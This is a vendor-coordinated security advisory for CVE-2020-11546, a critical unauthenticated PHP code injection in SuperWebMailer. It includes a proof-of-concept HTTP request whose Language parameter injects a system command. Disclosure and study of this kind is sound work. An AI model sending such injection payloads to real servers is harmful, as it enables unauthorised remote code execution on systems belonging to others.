Advisory: SuperWebMailer < 7.40.0.01550 Unauthenticated Remote Code Execution (CVE-2020-11546)
Detailed Security Advisory
Advisory ID: TO-2020-001
Product: SuperWebMailer
Vendor: Mirko Böer Softwareentwicklungen, Leipzig
Tested Version: 7.21.0.01526
Fixed Version: 7.40.0.01550 (released 2020-04-08)
Vulnerability Type: Unauthenticated Remote PHP Code Injection
CVSS Risk: 10.0
CVSSv3: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Mitigation: Installation of the software upgrade provided by the vendor
CWE Reference: CWE-94
CVE Reference: CVE-2020-11546
Authors: Tobias Györfi and Dimitri Lesy, Thinking Objects GmbH
Overview
SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the „Language“ parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this to execute arbitrary PHP code in the webserver’s context.
Proof of Concept
The following request triggers the execution of „ls -lah“ on the remote system:
POST /mailingupgrade.php HTTP/1.1 Host: XXXXXXXXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: XXXXXXXXX/mailingupgrade.php Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: XXXXXXXXX Connection: close Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXX Upgrade-Insecure-Requests: 1 step=4&Language=de%7b$%7bsystem(%22ls%20-alh%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E
Server response:
Remediation
Installation of the software upgrade version 7.40.0.01550 provided by the vendor.
Disclosure Timeline
2020-03-27: Vulnerability discovered
2020-03-30: Vulnerability reported to vendor
2020-03-30: Vendor response
2020-04-04: CVE reserved
2020-07-06: Verification that the vulnerability no longer exists in version 7.50.0.01560
2020-07-14: Vulnerability disclosed
References
[1] Advisory URL: https://blog.to.com/advisory-superwebmailer-cve-2020-11546
[2] Superwebmailer Website: https://www.superwebmailer.de/
Disclaimer
The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on blog.to.com.
Copyright: Creative Commons – Attribution (by) – Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en